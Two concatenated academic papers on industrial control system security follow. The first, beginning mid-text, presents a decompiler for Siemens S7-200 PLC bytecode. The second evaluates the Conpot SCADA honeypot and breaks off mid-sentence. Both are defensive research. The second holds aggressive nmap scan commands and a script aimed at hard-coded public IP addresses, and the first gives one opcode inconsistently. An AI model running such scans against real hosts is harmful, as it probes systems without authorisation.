introduce the instruction template and operand template,some algorithms are also presented. Section 5 evaluates the presented framework by decompiling several PLC programs, the results are shown in a table. Finally Section 6 concludes the paper. II. OVERVIEEW OF PLC PROGRAMMING LANGUAGES User programs of PLC are designed by programmers according to the process control requirements using specific PLC programming languages. In accordance with the industrial control programming language standard IEC1131-3[17] established by International Electrotechnical Commission (IEC), PLC programming languages include Ladder Diagram (LD), Sequential Function Chart (SFC), Function Block Diagram (FBD), Instruction List (IL), and Structured Text (ST). Different kinds of PLCs support different programming languages. For example, Simens S7-200 series PLCs support LAD, STL and FBD. 
STL is somewhat similar to an assembly language. An STL instruction includes two parts, mnemonic and operand; here are some examples: LD I0.0; A I0.1; = Q1.0. The S7-200 manual [18] defines a total of 246 kinds of mnemonics, which compose 19 classes of instructions, such as bitwise logical instructions, clock instructions, comparison instructions and transformation instructions. An operand is composed of an operand sign and parameters. The operand sign can be further classed into a master sign and an auxiliary sign. The master sign decides in which storage region the operand is stored, and the auxiliary sign defines the operand size, while the parameters decide the exact location of the operand. The master signs include I, Q, S, SM, T, and so on, and the auxiliary signs are made up of X (bit), B (byte), W (word) and D (dword).

III. MAPPING RULES BETWEEN INSTRUCTION AND BYTECODE
The relationship between the instruction set and the corresponding bytecode set is a one-to-one mapping. Suppose INSS denotes the instruction set, BCS denotes the bytecode set, and f is the mapping function from INSS to BCS; then ∀ Instruction ∈ INSS, ∃ ByteCode ∈ BCS s.t. ByteCode = f(Instruction), and ∀ ByteCode ∈ BCS, ∃ Instruction ∈ INSS s.t. Instruction = f⁻¹(ByteCode). To work out the mapping function f, we need to know the instruction set and the corresponding bytecode set of the target PLC. The instruction set can be found in the manual, while it takes some effort to extract the bytecode set.

Fig. 1. NOP instruction and the corresponding bytecode

A. Start Position Determination of Code Segment
The bytecode file is the executable file of the PLC and is organized according to a certain structure, in which the instruction bytecode is located in the code segment and the data in the data segment. Since the structure of the bytecode file is unknown, it is necessary to determine the start position of the code segment. The no-operation (NOP) instruction is a PLC instruction that does not perform any operation, and is thus suitable for accomplishing this task.

Fig. 2. An example of the NOP-division method: the instruction sequence NOP 0; LDN M0.0; NOP 0; TON T33,100; NOP 0; LDW>= T33,40; NOP 0; = Q0.1; NOP 0; LD T33; NOP 0; = M0.0; NOP 0 and its compiled bytecode.

First, we write a source program containing only four consecutive, identical instructions (NOP 0) and, after compilation, extract the bytecode file. Obviously, the bytecode file should then contain four consecutive and identical bit sequences; we find them in a binary editor, as shown in figure 1. The bytecode file includes four consecutive bit sequences FF 00, which shows that FF 00 is the corresponding bytecode of the instruction NOP 0, and the start position of the code segment is where the first FF 00 sequence is located.

B. Bytecode Extraction
Through observation we find that the instruction storage order is the same as that of the corresponding bytecode; apparently, if the start position of the first instruction bytecode and the size of each instruction bytecode are known, it is easy to extract all the bytecode. However, instruction sizes are not always the same. To solve this problem, we propose a NOP-division method to extract batches of instruction bytecode.
NOP-division method employs NOP instructions to divide other instructions, thus we can determine the start and end position of each instruction bytecode through the bit sequences of NOP instruction. As shown in figure 2, we adopt NOP-division method to extract the corresponding bytecode of s ome instructions, like LDN M0.0 , TON T33, 100 , etc. INVB VB255 INVB LB0 INVB LB15 INVB LB63 INVB AC0 INVB AC1 INVB IB0 11110100 00001100 10000000 11111111 11110100 00001100 11100000 00000000 11110100 00001100 11100000 00001111 11110100 00001100 11100000 00111111 11110100 11001100 11110100 11011100 11110100 00001100 00000000 00000000 InsCode Instruction Fig. 3. INVB formed instruction and the InsCode C. Mnemonic Mapping Rules Each STL instruction has only one mnemonic, but may has several operands. For convenience, in this paper, we use InsCode to denote the bytecode corresponding to an instruction, OpCode to denote the corresponding bytecode of mnemonic, and OprandCode to denote the corresponding bytecode of operand. To determine the Opcode , we should fix the mnemonic, and change the operands in one experiment. In this way, we can make sure that the unchanged part of InsCode must be the Opcode , and the remainder is the OperandCode . For a specific mnemonic, we change the operands to structure some instructions, and extract the InsCode using NOP-division method, then we can analyze the mapping rules of menmomic. Since operands diverse in numbers, we discuss the problem in three cases, instructions with no operand, instructions with one operand and instructions with several operands. (1) Instructions with no operand For instructions with no operand, InsCode equals to OpCode . For example, the InsCode of instruction EU is 11100001 , and the OpCode is also 11100001 . (2) Instructions with one operands For instructions with one operand, we change the operand in one experiment and study the changes of InsCode . Take mnemonic INVB for instance, we structures some 253 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:28 UTC from IEEE Xplore. Restrictions apply. instructions and extract the InsCode , the result is shown in figure 3. We can see that the first byte of all InsCode are the same, thus we conclude that the OpCode of INVB is 11110100 . (3) Instructions with several operands For instructions with several operands, using similar method as the second situation, change only one operand in one experiment, the InsCode part that has no change all the time is the OpCode . D. Operands Mapping Rules It s more difficult to analyze operands mapping rules due to various operand kinds and uncertain operand number. Operand kinds of s7-200 PLCs include immediate data, string and memorizer. For immediate and string operand, s7-200 PLCs adopt a direct coding strategy, so by direct decoding the OperandCode we can easily obtain the operands, therefore we only discuss memorizer operands in this paper. Memorizer operands contain memorizer symbol, byte (word, or dword) number, may also contain bit number when the second field is byte number. For example, operand I10.1 contains memorizer symbol I , byte number 10 and bit number 1 . If an instruction contains only one operand, OperandCode is the remainder of InsCode except for the OpCode . 
For instance, the InsCode o f i n s t r u c t i o n I N V B V B 2 5 5 i s a s follows: INVB VB255 11110100 00001100 10000000 11111111 From previous discussion we know the OpCode of INVB is 11100100 , therefore the gray part of the InsCode identifies the OperandCode of operand VB255 . For instructions with multiple operands, fix one operand and the mnemonic and change other operands in one experiment, the unchanged part except for the OpCode corresponds to the fixed operand. During our research we find the operand type is defined by a field whose size may be 4 bits, 1 byte or 2 bytes, which we denote as OperandType . Taking an instruction LDB= IB0, IB0 as example, its InsCode is 10010001 00000000 00000000 00000000 00000000 00000000 , t h e g r a y p a r t i s t h e OperandType of the first operand IB0 . To confirm an OperandType , a lot of experiments is needed. The OperandType 0000 indicates the m e m o r i z e r s y m b o l i s o n e o f I , Q , M , S , S M , V and L . The size of OperandType is related to operand type and operand number. Memorizer symbol, byte (word, or dword) number and bit number all map to a specific field in OperandCode . In this paper, we employ masks to represent the position of the fields in InsCode, and by AND operation we can obtain the corresponding coding. For example, byte number coding (ByteNC) = OperandCode & byte number coding mask (ByteNCM). Through ByteNC we can uniquely determine the byte number. Word(or dword) number and bit number can be determined in the same way. If bit number does not exist, then bit number co ding mask (BitNCM) is NULL. IV. I NSCODE DECOMPILATION FRAMEWORK As previously described, STL is kind of like assembly language, decompiling of STL programs can be inspired by disassembly algorithms. Classical disassembly algorithms mainly include linear scanning algorithm[18] and recursive traversal algorithm[19]. The linear scanning algorithm disassembles instructions one after another from the first byte. During disassembling, the size of each instruction is calculated, and is used to determine the start position of next instruction. It can cover all the code segment but does not consider the condition that data is mixed in code. While the recursive traversal algorithm disassembles instructions according to circumstance how the instructions are referenced, it can separate code and data, yet it is more complicated than the first one. Since data and code are separated in PLC bytecode file, we adopt the liner scanning algorithm for the sake of simplicity. The steps are as follows. (1) Position pointer IpStart points to start of the code segment. (2) Attempt to match instruction form where IpStart points to, and obtain the instruction size n. (3) If step 2 succeeds, decompile n bytes after where IpStart points to. If fails, then exit. (4) Assign IpStart +n to IpStart (5) Judge whether the value of IpStart is beyond the end of code segment Step (3) is the kernel of the whole system, it decompiles each piece of InsCode. To provide a convenient for InsCode decompilation, we present instruction template and operand template, upon which some decompiling algorithms are also designed. InsCode decompilation framework is shown in figure 4. Instruction template libraryOperand template libraryInscode OpCode OperandCode Mnemonic OperandPointer of current instruction template Algorithm1 Algorithm2Algorithm3 Fig. 4. InsCode decompiling framework The framework can be divided into two parts, mnemonic resolution and operand resolution. 
To support InsCode decompilation we introduce an instruction template and an operand template, on top of which the decompiling algorithms are designed. The InsCode decompilation framework is shown in Fig. 4 (it combines an instruction template library, an operand template library and Algorithms 1-3, which map an InsCode to its mnemonic and operands). The framework is divided into two parts: mnemonic resolution and operand resolution. First, it resolves the mnemonic on the basis of the instruction template library and Algorithm 1 and obtains a pointer to the current instruction template. Then it obtains the OperandType of every operand through Algorithm 2. Finally, it resolves the operands using the OperandType, the operand template library and Algorithm 3. The resolved mnemonic and operands make up a complete instruction.

A. Instruction Template
We place all instructions that share the same mnemonic into one category, called an instruction class. Every instruction in an instruction class is described by the same structure, which we call an instruction template. The instruction template contains information about the mnemonic and the operands. The mnemonic information includes the mnemonic type, the OpCode, the OpCode mask, and so on; the OpCode is obtained by an AND operation between the OpCode mask and the InsCode. The operand information includes the operand number, the OperandType mask list, the start position of the OperandCode in the InsCode, etc. The OperandType mask list contains all the OperandType masks; an OperandType is obtained by an AND operation between an OperandType mask and the InsCode. The data structure of the instruction template is as follows.

struct Ins {
    string Mnemonic;                     // the mnemonic type
    int OpCode;                          // the OpCode
    long long OpMask;                    // the OpCode mask
    int OperandNum;                      // the operand number
    OperandTypeMask *OperandTypeMasks;   // pointer to the OperandType mask list
    int Pos;                             // start position of the OperandCode
    Ins *Ptr;                            // pointer to the next instruction template
};

Within struct Ins, OperandTypeMask is defined as follows.

struct OperandTypeMask {
    long long Mask;                      // the OperandType mask
    OperandTypeMask *ptr;                // pointer to the next list node
};

Taking the mnemonic LDB= as an example, its instruction template is described in Table I.

Algorithm 1: INSTRUCTION-TEMPLATE-BASED MNEMONIC RESOLUTION
Input: InsCode
Output: Mnemonic, InsPtr
Begin
 1  CurrentIns = InstHead              // CurrentIns points to the head of the instruction template list
 2  while CurrentIns != NULL do
 3      tmpOpcode = InsCode & CurrentIns->OpMask;
 4      if tmpOpcode == CurrentIns->OpCode then    // match success!
 5          Mnemonic = CurrentIns->Mnemonic;
 6          InsPtr = CurrentIns;
 7          break;
 8      end if
 9      CurrentIns = CurrentIns->Ptr;
10  end while
End

B. Operand Templates
All operands that share the same operand sign are grouped into one class, and each class is described by an operand template. Since the same operand may be coded differently after different mnemonics, one template has to be built for every mnemonic, which takes considerable time. An operand template contains the operand sign, the operand sign coding mask (OSCM), the operand sign coding (OSC), etc. The OSC is obtained by an AND operation between the OSCM and the OperandCode; the byte number and bit number are obtained in the same way. An operand template is organized as a list whose nodes are structured as follows.

struct Operand {
    string Sign;         // the operand sign
    int SignMask;        // the OSCM
    int SignCode;        // the OSC
    int ByteMask;        // byte/word/dword number mask
    int BitMask;         // bit number mask
    Operand *ptr;        // pointer to the next operand template
};

Taking the operand sign IB as an example, its operand template is described in Table II.
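These template structures and the list-traversal matching of Algorithm 1 can be phrased compactly in Python, as sketched below. Only the INVB entry reuses values established earlier (OpCode 11110100 over the first byte of a four-byte InsCode); every other field value is illustrative, and the class and function names are ours.

# Template-based mnemonic resolution (Algorithm 1) over a small template list.
# The INVB entry mirrors the OpCode found above (0xF4 masked over the first
# byte); the operand-related fields are illustrative only.

from dataclasses import dataclass, field
from typing import List, Optional

@dataclass
class InstructionTemplate:
    mnemonic: str
    opcode: int                      # expected bits after masking the InsCode
    op_mask: int                     # bits of the InsCode that form the OpCode
    operand_num: int = 0
    operand_type_masks: List[int] = field(default_factory=list)
    operand_pos: int = 8             # start position of the OperandCode (bits)

TEMPLATES = [
    InstructionTemplate("INVB", opcode=0xF4000000, op_mask=0xFF000000,
                        operand_num=1, operand_type_masks=[0x00F00000]),
]

def resolve_mnemonic(ins_code: int) -> Optional[InstructionTemplate]:
    """Algorithm 1: walk the template list and return the first template whose
    masked bits equal the InsCode's OpCode field."""
    for tpl in TEMPLATES:
        if ins_code & tpl.op_mask == tpl.opcode:
            return tpl
    return None

ins_code = 0xF40C80FF                # INVB VB255: 11110100 00001100 10000000 11111111
tpl = resolve_mnemonic(ins_code)
print(tpl.mnemonic if tpl else "no match")   # -> INVB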
Algorithm 2: OBTAIN THE n-TH OperandType
Input: InsPtr, InsCode, n
Output: OperandType
Begin
 1  P = InsPtr->OperandTypeMasks;
 2  i = 0;
 3  while i < n do
 4      P = P->ptr;
 5      i++;
 6  end while
 7  OperandType = InsCode & P->Mask;
End

C. Decompilation Process
On the basis of the proposed templates, we present a template-based decompilation technique. In this section we introduce the decompilation process with the aid of the algorithms. The process mainly includes two parts: mnemonic resolution and operand resolution.

Algorithm 3: OPERAND RESOLUTION
Input: InsPtr, OperandCode, OperandType
Output: OperandSign, OperandByte, OperandBit
Begin
 1  Ptr = Select(OperandType);   // choose an operand template according to the OperandType;
                                 // Select() returns the head pointer of the operand template list
 2  while Ptr != NULL do
 3      tmpCode = OperandCode & Ptr->SignMask;
 4      if tmpCode == Ptr->SignCode then                 // match success!
 5          OperandSign = Ptr->Sign;                     // resolve the operand sign
 6          OperandByte = OperandCode & Ptr->ByteMask;   // extract the byte (word/dword) number
 7          OperandBit  = OperandCode & Ptr->BitMask;    // extract the bit number
 8          break;
 9      end if
10      Ptr = Ptr->ptr;
11  end while
End

1) Mnemonic Resolution
Mnemonic resolution is performed with Algorithm 1. The algorithm takes a piece of InsCode as input and outputs the mnemonic type and a pointer. It traverses the instruction template list and, for each node, performs an AND operation between the InsCode and the mask CurrentIns->OpMask, then compares the result with CurrentIns->OpCode. If they are equal, it assigns the current pointer to InsPtr and exits; InsPtr then identifies the matching instruction template used to resolve the InsCode, and CurrentIns->Mnemonic is the corresponding mnemonic type. Otherwise it continues with the next node.

2) Operand Resolution
After mnemonic resolution we obtain the operand information stored in the instruction template. The parameter InsPtr->OperandNum gives the number of operands of the source instruction; if it equals zero, the source instruction has no operand and no operand resolution is needed. Otherwise, to resolve an operand we first obtain its OperandType through an AND operation between the InsCode and the corresponding OperandType mask taken from the instruction template; Algorithm 2 shows how to obtain the n-th OperandType. Once all the OperandTypes are known, for every operand we choose an operand template that matches its OperandType and traverse the template list to find the node that is consistent with the OperandCode. If a matching node is found, traversal stops and that node is used to resolve the operand; otherwise the next node is examined. The kernel of operand resolution is shown in Algorithm 3. The operand sign, the byte (word/dword) number and the bit number make up a complete operand. Algorithm 3 may be employed several times, since there may be more than one operand.

TABLE I. AN EXAMPLE OF A MNEMONIC (INSTRUCTION) TEMPLATE
  Member        Description                          Value
  Mnemonic      Mnemonic type                        LDB=
  OpCode        OpCode                               91
  OpMask        OpCode mask                          F00000000000
  OperandNum    Operand number                       2
  Pos           Start position of the OperandCode    16
TABLE II. AN EXAMPLE OF AN OPERAND TEMPLATE
  Member     Description                              Value
  Sign       Operand sign                             IB
  SignMask   Operand sign coding mask (OSCM)          F000
  SignCode   Operand sign coding (OSC)                00
  ByteMask   Byte/word/dword number coding mask       0FFF
  BitMask    Bit number coding mask (BitNCM)          NULL

TABLE III. DECOMPILATION RESULTS FOR 11 PLC PROGRAMS
  Name                        Instructions   Code coverage /%   Accuracy /%   Time consumed /ms
  Gas transmission            3688           100                95            51.7
  Fountain                    39             100                100           0.58
  Manipulator                 91             100                100           1.28
  Traffic lights              71             100                100           1.03
  Three-phase asynchronous    164            100                100           2.43
  Water tower                 37             100                100           0.56
  Tower light                 83             100                100           1.16
  Four-layer elevator         613            100                100           9.13
  Liquid mixing               46             100                100           0.69
  Mail sorting                232            100                100           3.29
  Rolling mill                36             100                100           0.58

V. DECOMPILATION EXPERIMENTS
To validate the efficiency of the proposed framework and algorithms, we conducted several experiments. One difficulty is that there is no classical benchmark program for Siemens PLCs, nor for other manufacturers, and we have found no directly comparable work so far. We therefore conducted decompilation experiments on 11 programs taken from the Internet [20]; the results are shown in Table III. The test platform was an Intel Core i7-4710Q CPU @ 2.5 GHz with 8.00 GB of RAM. Code coverage is 100% for every program, and decompilation accuracy is 100% for all programs except the largest one (95% for the gas transmission program); almost all of the InsCode was therefore correctly decompiled, which indicates that the linear scanning algorithm is suitable for PLC bytecode decompilation. This can mainly be attributed to the rather simple structure of PLC bytecode and its uncomplicated coding strategy. The total number of instructions is 5100 and the total processing time is 72.43 ms, so the average processing time per piece of InsCode is 0.0142 ms. We cannot benchmark this time against other tools, since we have found no comparable decompiler, but even a large program containing thousands of instructions would be processed in a few seconds, which we consider acceptable given that PLC programs are usually small.

VI. CONCLUSION
The security of PLC programs is very important to the whole industrial control system, yet current security strategies are of limited help once a PLC program has been infected. Decompiling PLC programs supports their security analysis. Our proposed framework achieves acceptable processing times, and nearly all of the bytecode was correctly decompiled, which shows that the linear scanning algorithm is well suited to the decompilation of PLC programs. Because the framework stores its information in instruction and operand templates organized as lists, its space efficiency is less satisfactory. The framework can also be applied to other families of PLCs, but the templates have to be redesigned and the data structures adjusted accordingly.
REFERENCES
[1] M. Cheminod, L. Durante, and A. Valenzano, "Review of Security Issues in Industrial Networks," IEEE Transactions on Industrial Informatics, vol. 9, no. 1, pp. 277-293, 2013.
[2] P. Jie and L. Li, "Industrial Control System Security," pp. 156-158.
[3] R. S. H. Piggin, "Development of industrial cyber security standards: IEC 62443 for SCADA and Industrial Control System security," pp. 1-6.
[4] R. Langner, "Stuxnet: Dissecting a Cyberwarfare Weapon," IEEE Security & Privacy Magazine, vol. 9, no. 3, pp. 49-51, 2011.
[5] G. P. H. Sandaruwan, P. S. Ranaweera, and V. A. Oleshchuk, "PLC security and critical infrastructure protection," pp. 81-85.
[6] S. A. Milinkovic and L. R. Lazic, "Industrial PLC security issues," pp. 1536-1539.
[7] H. Senyondo, P. Sun, R. Berthier, and S. Zonouz, "PLCloud: Comprehensive power grid PLC security monitoring with zero safety disruption."
[8] G. Cebrat, "Web Based Home Automation: Application Layer Based Security for PLC Controller," pp. 302-307.
[9] E. A. Emerson, The Beginning of Model Checking: A Personal Perspective. Springer-Verlag, 2008.
[10] B. Schlich, J. R. Brauer, J. R. Wernerus, and S. Kowalewski, "Direct model checking of PLC programs in IL," pp. 28-33.
[11] O. Pavlovic and H. D. Ehrich, "Model Checking PLC Software Written in Function Block Diagram," pp. 439-448.
[12] S. McLaughlin, "A Trusted Safety Verifier for Process Controller Code."
[13] B. Zhu and S. Sastry, "SCADA-specific Intrusion Detection/Prevention Systems: A Survey and Taxonomy."
[14] N. Erez and A. Wool, "Control variable classification, modeling and anomaly detection in Modbus/TCP SCADA systems," International Journal of Critical Infrastructure Protection, vol. 10, pp. 59-70, 2015.
[15] J. Jiang and L. Yasakethu, "Anomaly Detection via One Class SVM for Protection of SCADA Systems," pp. 82-88.
[16] B. Kroll, D. Schaffranek, S. Schriegel, and O. Niggemann, "System modeling based on machine learning for anomaly detection and predictive maintenance in industrial plants," pp. 275-280.
[17] IEC 1131-3, Programmable Controllers - Part 3: Programming Languages, International Electrotechnical Commission, Geneva, vol. 21, no. 1, pp. 27-51, 1993.
[18] Siemens, S7-200 Programmable Controller System Manual, TailieuVN.
[19] M. Xu, "Research on Static Disassembly Algorithm," Computer & Digital Engineering, 2007.
[20] http://download.csdn.net/detail/bretch/2574792
SCADA_honeypots_An_in-depth_analysis_of_Conpot.pdf
Supervisory Control and Data Acquisition (SCADA) honeypots are key tools not only for determining threats which pertain to SCADA devices in the wild, but also for early detection of potential malicious tampering within a SCADA device network. An analysis of one such SCADA honeypot, Conpot, is conducted to determine its viability as an effective SCADA emulating device. A long-term analysis is conducted and a simple scoring mechanism leveraged to evaluate the Conpot honeypot.
SCADA Honeypots An In-depth Analysis of Conpot Arthur Jicha, Mark Patton, and Hsinchun Chen University of Arizona Department of Management Information Systems Tucson, AZ 85721, USA [email protected], mpatton@ema il.arizona.edu, [email protected] Keywords Supervisory Control and Data Acquisition systems, honeypots, Conpot, network security I. INTRODUCTION In a world where the value of information is ever increasing, hackers are consiste ntly targeting governments, corporations, and individuals to obtain valuable secrets, proprietary data, and personally identifiable information (PII). Honeypots can be used to better understand the landscape of where these attacks are orig inating. Honeypots can be leveraged not only to conduct research on threats in the wild, but also to notify an organization if a potential threat is within one s network. Supervisory Control and Data Acquisition (SCADA) systems are a critical ta rget, and with the advent of SCADA honeypots, attempts to access or tamper with SCADA devices can be preemptively identified and analyzed. A. Background SCADA Honeypots attempt to mimic an active SCADA system. A typical SCAD A system is composed of four parts: a central computer (host), a number of field-based remote measurement and control units known as Remote Terminal Units (RTUs), a wide area telecommunications system to connect them, and an operator interface to allow the operator to access the system [1]. Conpot is a low-interactive SCADA honeypot and serves the purpose of being extremely easy to implement. Serbanescu et al., for example, found th at Conpot would support the simulation of hypertext transfer protocol (HTTP), Modbus (a serial communication protocol), and Simple Network Management Protocol (SNMP; used for network management), and the integration of programmable logic controllers (PLC) [2]. The Co npot project by The Honeynet Project was released in May 2013. Conpot utilizes a logging system to monitor any changes th at are made by intruders. The honeypot logs events of HTTP, SNMP and Modbus services with millisecond accuracy an d offers basic tracking information such as source address, request type, and resource requested in the case of HTTP [3]. B. Research Gap In a literature review of SCADA honeypots, a gap was identified regarding the analysis of the effectiveness of the various honeypots. Studies were found that detailed the interactions occurring with a given honeypot, i.e., Digital Bond Honeynet and Conpot; however, studies of the actual effectiveness of any given honeypot have not been conducted. The closest approach to this fi eld of study was carried out by Fronimos, et. al., whose study focused on evaluating the usability and performance of Low Interaction Honypots, but did not examine the specifics of SCADA honeypot efficacy [4]. A more detailed look at the efficacy of SCADA honeypots that takes into account their uniq ue requirements has not been conducted prior to this res earch. This paper performs a detailed evaluation of the Conpot SCADA Honeypot. II.E XPERIMENT APPROACH To conduct a full analysis of the SCADA honeypot Conpot, a virtualized image was created and used in multiple Amazon Web Services (AWS) zones. The SCADA honeypots ran from March 25 th to April 11th and the logs were subsequently analyzed. An additional log set was pulled April 27 th for further analysis. The following section outlines the steps for setup and process for creating instances of Conpot. 
Installation of Conpot is quite simple; however, certain dependencies are necessary for it to fully function. Due to the age of some of the required packages, repositories must be added manually. Ubuntu 12.04, an open-source Linux distribution, was used as the base operating system for a micro-instance within AWS, after configuring basic settings and applying updates.
A. Experiment Setup
After successfully obtaining the Conpot start screen, the AWS micro-instance was shut down so that an image could be created. Using the Create Image function within AWS, the image was added to the Images AMI folder for deployment and then propagated to additional AWS deployment zones. After deploying the image twice in each zone (see Table I), the SCADA honeypots were booted and accessed via SSH to finalize their deployment. (This material is based upon work supported by the U.S. National Science Foundation under Grant No. DUE-1303362 and SES-1314631.)
An advantage of leveraging AWS is its key management and port security options. Each Conpot instance was set up to allow all ports to be accessible, so as to provide an accurate view of port information when running any given honeypot template. Furthermore, the key pair options facilitated maintaining secure access to each instance. After obtaining the private key necessary to create a connection, each instance was generated using the same public key, which allowed access using one private certificate combined with the instance password. After accessing each honeypot, the following command was used to start Conpot with the designated template:
sudo conpot --template [template name]
If a template name is not selected, the default option of default is used. For the purposes of the honeypot analysis, an in-depth review of both the Guardian AST gas pump monitoring system and the default Siemens S7-200 ICS was performed, together with a brief analysis of the IPMI-371 and Kamstrup 382 smart meter SCADA devices.
B. AWS Deployment
The following table summarizes the deployed Conpot honeypots by their location, IP address, and template details. The honeypots were deployed globally across AWS for future analysis of regional variations in attack frequency and type.
TABLE I. AWS CONPOT DEPLOYMENT ZONE INFORMATION
  AWS Location      Name       IP               Details
  us-east-1a        Conpot1    52.23.225.126    Default template
  us-east-1a        Conpot2    54.86.249.160    Emulation of gas tank level
  us-west-2b        Conpot3    52.36.62.44      Default template
  us-west-2b        Conpot4    52.32.45.32      Emulation of gas tank level
  eu-west-1b        Conpot5    52.30.167.154    Default template
  eu-west-1b        Conpot6    52.19.95.69      Emulation of gas tank level
  ap-northeast-1c   Conpot7    52.192.20.179    Default template
  ap-northeast-1c   Conpot8    52.196.47.205    Emulation of gas tank level
  ap-southeast-1b   Conpot9    54.254.141.38    Default template
  ap-southeast-1b   Conpot10   54.254.140.52    Emulation of gas tank level
  sa-east-1a        Conpot11   54.207.96.59     Default template
  sa-east-1a        Conpot12   54.232.248.38    Emulation of gas tank level

III. DATA AND RESULTS
A. Nmap Scan Data
The security scanner Nmap was used to check the open ports after starting Conpot. Nmap was chosen because it is a mature, robust, connection-oriented scanning tool that is widely used and has broad support for many protocols.
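The staged scans described in the rest of this section lend themselves to simple automation. The sketch below wraps the three flag combinations used in the analysis and collects the open ports each stage reports; the IP addresses are two of the instances from Table I, the helper name is ours, and a production script would rather parse Nmap's XML output (-oX) than the grepable format.

# Sketch: run the three staged Nmap scans against deployed Conpot instances
# and collect the open TCP ports reported by each stage.
# Assumes nmap is installed and on PATH; IPs are examples from Table I.

import re
import subprocess

HONEYPOTS = {
    "Conpot1 (default template)": "52.23.225.126",
    "Conpot2 (gas tank emulation)": "54.86.249.160",
}

SCAN_STAGES = {
    "aggressive":           ["-A", "-v"],
    "aggressive, no ping":  ["-A", "-v", "-Pn"],
    "no ping, all ports":   ["-A", "-v", "-Pn", "-p-"],
}

def open_ports(target, flags):
    """Run one Nmap stage and return the set of ports reported as open."""
    result = subprocess.run(["nmap", *flags, "-oG", "-", target],
                            capture_output=True, text=True, check=True)
    return {int(p) for p in re.findall(r"(\d+)/open", result.stdout)}

if __name__ == "__main__":
    for name, ip in HONEYPOTS.items():
        for stage, flags in SCAN_STAGES.items():
            print(f"{name} [{stage}]: {sorted(open_ports(ip, flags))}")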
For initial comparison, a vanilla installation of Ubuntu was also deployed and scanned to show what ports are open by default. The following Nmap scanni ng commands were used: nmap -A -v [IP Address] nmap -A -v -Pn [IP Address] nmap -A -v -Pn -p- [IP Address] Nmap was used in a staged approach to show what different scanning techniques showed as the open port results (Tables II and III). The flag -A results in Nmap turning on version detection and other Advanced and Aggressive features (nmap.org). This scanning technique is intrusive and readily detected due to its aggr essive scanning and operation systems (OS) detection, but it provides a good representation of what to expect for identification. Using the -Pn resulted in Nmap suppressing pings when conducting scans to determine if a host is up. For the purposes of the analysis, the virtual machines were already known to be operational and in some cases their configurations reject ed pings. The -p- flag was also used to conduct a scan over the entire port range (ports 1-65535). Lastly, the flag -v (version detection) was used also, although it was later deemed not necessary, as the A flag already included version detection. TABLE II. N MAP SCANNING (UTILIZING FLAGS V AND A) Honeypot Type Result Ports Opened by Conpot Siemens S7-200 22, 80 80,102, 161, 502, 623, 47808 Guardian AST N/A 10001 IPMI N/A 623 Kampstrup Smart Meter N/A 1025, 50100 Scanning with the -v and -A flags resulted in no results from the Guardian AST, IPMI , and Kampstrup smart meter, due to pings being rejected by these SCADA configurations. The revelation of port 22 through a ping scan should allow an attacker to question whether the Siemens S7-200 emulator is a honeypot or an actual SCADA device. TABLE III. NMAP SCANNING (UTILIZING V, -A, AND -PN FLAGS ) Honeypot Type Result Ports Opened by Conpot Siemens S7-200 22, 25, 80, 514, 6009, 8443 80,102, 161, 502, 623, 47808 Guardian AST 22, 25, 514, 6004, 10001 10001 IPMI 22 623 Kampstrup Smart Meter 22, 25, 514, 1025, 1068 1025, 50100 After utilizing the -Pn flag to stop the ping option during scans, many more ports were identified across the various usable templates within Conpot. However most of these additional ports were not SCADA ports; for example, port 514 was for system logging, while many of the opened SCADA ports remained undetected. This indicates that Conpot installations running on Ubuntu appear to be very susceptible to having Ubuntu default services enabled and running across a multitude of ports that would not be available on a standard SCADA installation. As a final scan to compare against, all ports were scanned to determine what a full Nmap sc an would show as open port results (Table IV). On average the scans took around three to four hours to fully process due to the intensity of the scans. The wide range of additional open ports, including ports in the dynamic/private range of 49152-65536 (note: The Kampstrup Smart Meter statically assigns a port in this range) again calls into question the ability of a default Conpot installation that 197 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:48 UTC from IEEE Xplore. Restrictions apply. does not actively close all other port-opening Ubuntu services to masquerade as an actual SCADA device, if comprehensive port scanning is utilized, or even if repositories such as Shodan are. TABLE IV. 
N MAP SCANNING (UTILIZING V, A, PN, AND -P- FLAGS ) Honeypot Type Result Ports Opened by Conpot Siemens S7-200 22, 80, 102, 502, 514, 2000, 5060, 8008, 8020, 18556 80,102, 161, 502, 623, 47808 Guardian AST 22, 514, 2000, 3826, 5060, 8008, 8020, 10001, 11190, 19116, 36123, 43787, 48191, 63790 10001 IPMI 22, 2000, 5060, 8008, 8020 623 Kampstrup Smart Meter 22, 514, 1025, 2000, 4368, 5060, 8008, 32469, 50100, 52245, 57565 1025, 50100 Vanilla Ubuntu Install 22, 514, 2000, 5060, 8008, 8020, 38051, 38093, 47785 B. SHODAN Scan Data SHODAN data was also anal yzed to determine which ports it detected as open within the various Conpot templates. Shodan regularly scans the entire IPV4 internet address space and as such is a reliable indicator of what can be seen by third parties conducting reconnaissance scanning. Unfortunately, the IPMI and Kampstrup templates were never identified by SHODAN due to time constraints. TABLE V. SHODAN SCAN DATA RESULTS Honeypot Type SHODAN Port Scan Results Conpot Ports Siemens S7-200 22, 80, 102, 161 80,102, 161, 502, 623, 47808 Guardian AST 10001 10001 IPMI N/A 623 Kampstrup Smart Meter N/A 1025, 50100 C. Scan Data Discussion A very interesting finding in the Nmap scan data is that while the Guardian AST, Kampstrup, and IPMI devices all denied pings, the Siemens SIAMATIC S7-200 did not. When removing the ping option for the result set in Table III, the results were more comprehensive and revealing. In every scan result, port 22 was shown as open, which would be the case due to utilizing SSH to gain access to each honeypot via a terminal in Putty. When comparing what should have been seen as open ports for each respective template within Conpot to the results from Table III, Nmap failed to identify the following ports as open on their respective devices: Siemens S7-200: 102, 161, 502, 623, 47808 IPMI: 623 Kampstrup Smart Meter: 50100 However, these ports may not have been found due to not being part of the top 1,000 which Nmap commonly scans without being directed to scan each and every port. To that point, Nmap was eventually set to scan each and every port (Table IV). After scanning all ports, some ports that should have been open were still not found. The results are as follows for ports which were not found: Siemens S7-200: 161, 623, 47808 IPMI: 623 This requires further research. In the case of the Siemens device, SHODAN found port 161 and captured a banner from it, while Nmap did not detect it. What was more surprising during the full comprehensive scan was the large number of open ports that were not expected to be open at all within Table V. Due to the large variety of ports that were discovered to be open, the vanilla install of the Ubuntu image was deployed without running any Conpot template. Based on a scan of the vanilla Ubuntu, it appears that more ports were being opened than would be originally anticipated when running any given Conpot template. Further analysis will need to be conducted to determine which extra ports being opened might be indicative of a honeypot instead of an effective emulation. The results from the SHODAN scan were also very insightful in that they more accurately showed the Conpot instances as being SCADA devices . This is primarily because 